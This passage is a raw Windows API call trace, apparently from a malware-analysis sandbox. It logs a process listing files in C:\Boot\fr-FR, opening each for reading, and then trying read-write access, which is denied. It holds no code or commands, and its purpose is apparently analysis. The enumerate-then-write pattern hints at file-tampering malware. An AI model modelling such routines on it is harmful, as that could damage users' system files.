InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0083.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0083.381] AreFileApisANSI () returned 1 [0083.381] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0083.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88658 [0083.381] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x88658, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\fr-FR") returned 14 [0083.381] CreateFileW (lpFileName="C:\\Boot\\fr-FR" (normalized: "c:\\boot\\fr-fr"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.381] GetLastError () returned 0x5 [0083.381] GetLastError () returned 0x5 [0083.381] SetLastError (dwErrCode=0x5) [0083.381] GetLastError () returned 0x5 [0083.381] SetLastError (dwErrCode=0x5) [0083.381] GetLastError () returned 0x5 [0083.381] SetLastError (dwErrCode=0x5) [0083.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.381] AreFileApisANSI () returned 1 [0083.381] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0083.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88658 [0083.381] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x88658, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\fr-FR") returned 14 [0083.381] CreateFileW (lpFileName="C:\\Boot\\fr-FR" (normalized: "c:\\boot\\fr-fr"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.381] GetLastError () returned 0x5 [0083.381] GetLastError () returned 0x5 [0083.381] SetLastError (dwErrCode=0x5) [0083.381] GetLastError () returned 0x5 [0083.381] SetLastError (dwErrCode=0x5) [0083.381] GetLastError () returned 0x5 [0083.381] SetLastError (dwErrCode=0x5) [0083.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.382] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0083.382] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.382] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.382] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.382] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.382] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.382] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.382] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.382] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.382] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48a0490, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="hr-HR", cAlternateFileName="")) returned 1 [0083.382] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0083.382] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0083.382] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.382] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.382] FindFirstFileExW (in: lpFileName="C:\\Boot\\fr-FR\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78590 [0083.382] FindNextFileW (in: hFindFile=0x78590, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010bc12, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5ade2b, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.382] FindNextFileW (in: hFindFile=0x78590, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2096e751, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13558, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0083.382] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.382] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0083.382] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.382] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.382] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0083.382] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.382] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.382] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0083.382] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0083.382] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0083.382] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.382] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46358 [0083.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0083.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0083.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0083.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0083.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0083.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0083.511] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.511] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.511] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.511] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0083.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.511] AreFileApisANSI () returned 1 [0083.511] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\fr-FR\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\fr-FR\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0083.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.511] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.511] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0083.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0083.511] AreFileApisANSI () returned 1 [0083.511] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0083.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x533b8 [0083.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x533b8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 30 [0083.512] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0083.512] GetFileType (hFile=0x42c) returned 0x1 [0083.512] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0083.512] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0083.512] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0083.512] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0083.512] CloseHandle (hObject=0x42c) returned 1 [0083.513] AreFileApisANSI () returned 1 [0083.513] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0083.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53640 [0083.513] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x53640, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 30 [0083.513] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.513] GetLastError () returned 0x5 [0083.513] GetLastError () returned 0x5 [0083.513] SetLastError (dwErrCode=0x5) [0083.513] GetLastError () returned 0x5 [0083.513] SetLastError (dwErrCode=0x5) [0083.513] GetLastError () returned 0x5 [0083.513] SetLastError (dwErrCode=0x5) [0083.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0083.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0083.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.513] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.513] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.513] FindNextFileW (in: hFindFile=0x78590, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5ade2b, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf39fe447, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0083.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0083.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0083.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0083.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0083.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0083.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0083.514] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.514] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.514] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.514] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0083.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.514] AreFileApisANSI () returned 1 [0083.514] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\fr-FR\\memtest.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\fr-FR\\memtest.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0083.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.514] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.514] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0083.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0083.514] AreFileApisANSI () returned 1 [0083.514] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0083.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53718 [0083.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x53718, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\fr-FR\\memtest.exe.mui") returned 30 [0083.515] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\memtest.exe.mui" (normalized: "c:\\boot\\fr-fr\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0083.515] GetFileType (hFile=0x42c) returned 0x1 [0083.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0083.515] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0083.515] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0083.515] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0083.515] CloseHandle (hObject=0x42c) returned 1 [0083.516] AreFileApisANSI () returned 1 [0083.516] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0083.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x538c8 [0083.516] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x538c8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\fr-FR\\memtest.exe.mui") returned 30 [0083.516] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\memtest.exe.mui" (normalized: "c:\\boot\\fr-fr\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.516] GetLastError () returned 0x5 [0083.516] GetLastError () returned 0x5 [0083.516] SetLastError (dwErrCode=0x5) [0083.516] GetLastError () returned 0x5 [0083.516] SetLastError (dwErrCode=0x5) [0083.516] GetLastError () returned 0x5 [0083.516] SetLastError (dwErrCode=0x5) [0083.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0083.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0083.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.516] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.516] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.516] FindNextFileW (in: hFindFile=0x78590, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x68d68, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧뎠")) returned 0 [0083.516] FindClose (in: hFindFile=0x78590 | out: hFindFile=0x78590) returned 1 [0083.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0083.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0083.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0083.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0083.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0083.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46358 | out: hHeap=0x20000) returned 1 [0083.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0083.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0083.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0083.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0083.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0083.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0083.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.517] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.517] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.517] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, 